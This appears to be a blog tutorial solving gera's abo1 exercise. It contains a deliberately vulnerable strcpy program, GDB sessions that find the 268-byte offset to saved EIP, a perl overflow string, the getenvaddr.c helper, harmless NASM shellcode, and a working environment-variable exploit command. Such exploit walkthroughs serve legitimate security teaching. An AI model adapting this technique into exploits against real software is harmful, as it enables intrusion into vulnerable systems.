  1. Determine the location in memory of the variable buf.
  2. Determine the location in memory of the saved EIP within the stack frame for the call to the main() function, using our debugger GDB.
  3. Determine the offset (number of bytes) we need to overflow the saved EIP by subtracting the address of the saved EIP from the beginning address of the buf array. It’s worth noting here that the stack grows from higher addresses to lower addresses (whereas the heap grows in reverse direction), but it takes data from low-to-high just like anything else, which is something that will take you a while to get into your head permanently. A good (but old) document describing this is at tldp.org, and a thorough overview can be found at linux-mm.org.
  4. Through the first command line argument (a.k.a. argc[1]), send data which will hopefully cause the program to print out “you win!” upon exiting the strcpy() function.

Let’s get started by compiling the code and examining it in GDB to determine the locations in memory we are concerned with. I will be compiling the binary with the -static option, which will compile all of the external libc calls inline, it makes things a bit easier to see sometimes in GDB, but do whatever works for you.

hacking@hacking:~/InsecureProgramming $ gcc -ggdb -static -o abo1 abo1.c
hacking@hacking:~/InsecureProgramming $ gdb -q abo1
Using host libthread_db library &quot;/lib/tls/i686/cmov/libthread_db.so.1&quot;.
(gdb) set disassembly-flavor intel
(gdb) list
1       /* abo1.c                                       *
2        * specially crafted to feed your brain by gera */
3
4       /* Dumb example to let you get introduced...    */
5
6       int main(int argv,char **argc) {
7               char buf[256];
8
9               strcpy(buf,argc[1]);
10      }
(gdb) break 10
Breakpoint 1 at 0x8048251: file abo1.c, line 10.
(gdb) run AAAAAAAA
Starting program: /home/hacking/InsecureProgramming/abo1 AAAAAAAA

Breakpoint 1, main (argv=2, argc=0xbffff864) at abo1.c:10
10      }
(gdb) backtrace
#0  main (argv=2, argc=0xbffff864) at abo1.c:10
(gdb) info frame 0
Stack frame at 0xbffff620:
 eip = 0x8048251 in main (abo1.c:10); saved eip 0x8048455
 source language c.
 Arglist at 0xbffff618, args: argv=2, argc=0xbffff864
 Locals at 0xbffff618, Previous frame's sp is 0xbffff620
 Saved registers:
  ebp at 0xbffff618, eip at 0xbffff61c
(gdb) x/8x buf
0xbffff510:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff520:     0x41414141      0x41414141      0x41414141      0x41414141

We can see in the highlighted lines the address of the various points we are interested in, also we can see that after we have already exited the strcpy() function, that the buffer is indeed containing a bunch of “A” characters (0x41). Now that we know where everything is, we can do a bit of arithmetic and determine what our offset is, and then we can get along to deploying our simple shellcode to take control of the EIP register and make it do what we want.

hacking@hacking:~/InsecureProgramming $ gdb -q abo1
Using host libthread_db library &quot;/lib/tls/i686/cmov/libthread_db.so.1&quot;.
(gdb) break 10
Breakpoint 1 at 0x8048251: file abo1.c, line 10.
(gdb) run AAAAAAAA
Starting program: /home/hacking/InsecureProgramming/abo1 AAAAAAAA

Breakpoint 1, main (argv=2, argc=0xbffff864) at abo1.c:10
10      }
(gdb) info frame 0
Stack frame at 0xbffff620:
 eip = 0x8048251 in main (abo1.c:10); saved eip 0x8048455
 source language c.
 Arglist at 0xbffff618, args: argv=2, argc=0xbffff864
 Locals at 0xbffff618, Previous frame's sp is 0xbffff620
 Saved registers:
  ebp at 0xbffff618, eip at 0xbffff61c
(gdb) x/x buf
0xbffff510:     0x41414141
(gdb) print 0xbffff61c - 0xbffff510
$1 = 268
(gdb) quit
The program is running.  Exit anyway? (y or n) y
hacking@hacking:~/InsecureProgramming $ perl -e 'print &quot;A&quot; x 268 . &quot;BBBB\n&quot;;'
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB
hacking@hacking:~/InsecureProgramming $ gdb -q abo1
Using host libthread_db library &quot;/lib/tls/i686/cmov/libthread_db.so.1&quot;.
(gdb) break 10
Breakpoint 1 at 0x8048251: file abo1.c, line 10.
(gdb) run AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB
Starting program: /home/hacking/InsecureProgramming/abo1 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB

Breakpoint 1, main (argv=0, argc=0xbffff764) at abo1.c:10
10      }
(gdb) next
0x42424242 in ?? ()

Now that we have proven control over EIP by overflowing it with “B” characters (0x42), we can deliver the shellcode as described in previous tutorials.

Whiskey Tango Foxtrot?

There is one problem left to solve, it appears that the variable addresses for the regular runtime of the program differ from the variable addresses while in GDB. Since this code doesn’t print out the variable addresses at runtime like the stackN.c examples, and since we don’t want to modify the source to do so in the spirit of the exercise, we have to find another reliable way to exploit the program. There are some tricks we can employ here by placing our shellcode into an environment variable, and then using the getenv() C library call to determine the location of that environment variable in the program’s memory. All programs executed from Bash (or any shell, really) seem to load the environment variables defined in the shell (viewable with the env command) directly into the memory of any process run as a child of that shell. Once we have the location of the shellcode in the environment variable, we can overwrite the value of EIP with that location and successfully exploit the program. This technique is described in greater detail in Hacking: The Art of Exploitation, 2nd Edition by Jon Erickson (if you can’t tell, this is a pretty good book). Indeed, the getenvaddr.c we’re going to use below is provided for free from the book’s website. But if you’re following along with me here, you should really read this book in it’s entirety.

#include &lt;stdio.h&gt;
#include &lt;stdlib.h&gt;
#include &lt;string.h&gt;

int main(int argc, char *argv[]) {
	char *ptr;

	if(argc &lt; 3) {
		printf(&quot;Usage: %s &lt;environment variable&gt; &lt;target program name&gt;\n&quot;, argv[0]);
		exit(0);
	}
	ptr = getenv(argv[1]); /* get env var location */
	ptr += (strlen(argv[0]) - strlen(argv[2]))*2; /* adjust for program name */
	printf(&quot;%s will be at %p\n&quot;, argv[1], ptr);
}

We can then load our shellcode into an environment variable and overflow the buffer repeatedly with the determined address of the shellcode, which provides us with much win. I hope this was a pretty informative post, and I really hope you all who are following along (all two of you) consider purchasing these books I’m outlining, they are pretty invaluable as a central collection of knowledge. On to the next challenge!

hacking@hacking:~/InsecureProgramming $ cat abo1_shellcode.s
BITS 32             ;  Tell nasm this is 32-bit code.

jmp short one       ;  Jump down to a call at the end.

two:
; ssize_t write(int fd,  const void *buf, size_t count);
pop ecx           ; Pop  the return address (string ptr) into ecx.
xor eax, eax      ; Zero  out full 32 bits of eax register.
mov al, 4         ; Write  syscall #4 to the low byte of eax.
xor ebx, ebx      ; Zero out ebx.
inc ebx           ; Increment ebx to 1,  STDOUT file descriptor.
xor edx, edx
mov dl, 8        ; Length of the string
int 0x80          ; Do syscall: write(1, string, 14)

; void _exit(int status);
mov al, 1        ; Exit syscall #1, the top 3 bytes are still zeroed.
dec ebx          ; Decrement ebx back down to 0 for status = 0.
int 0x80         ; Do syscall: exit(0)

one:
call two   ; Call back upwards to avoid null bytes
db &quot;you win!&quot; ; with newline and carriage return bytes.
hacking@hacking:~/InsecureProgramming $ nasm -o abo1_shellcode abo1_shellcode.s
hacking@hacking:~/InsecureProgramming $ hexdump -C abo1_shellcode
00000000  eb 13 59 31 c0 b0 04 31  db 43 31 d2 b2 08 cd 80  |..Y1...1.C1.....|
00000010  b0 01 4b cd 80 e8 e8 ff  ff ff 79 6f 75 20 77 69  |..K.......you wi|
00000020  6e 21                                             |n!|
00000022
hacking@hacking:~/InsecureProgramming $ export SHELLCODE=$(cat abo1_shellcode)
hacking@hacking:~/InsecureProgramming $ env | grep SHELLCODE
SHELLCODE=? Y1?? 1?C1?? K??????you win!
hacking@hacking:~/InsecureProgramming $ ~/booksrc/getenvaddr SHELLCODE ./abo1
SHELLCODE will be at 0xbffff9e1
hacking@hacking:~/InsecureProgramming $ ./abo1 $(perl -e 'print &quot;\xe1\xf9\xff\xbf&quot; x 75;')
you win!hacking@hacking:~/InsecureProgramming $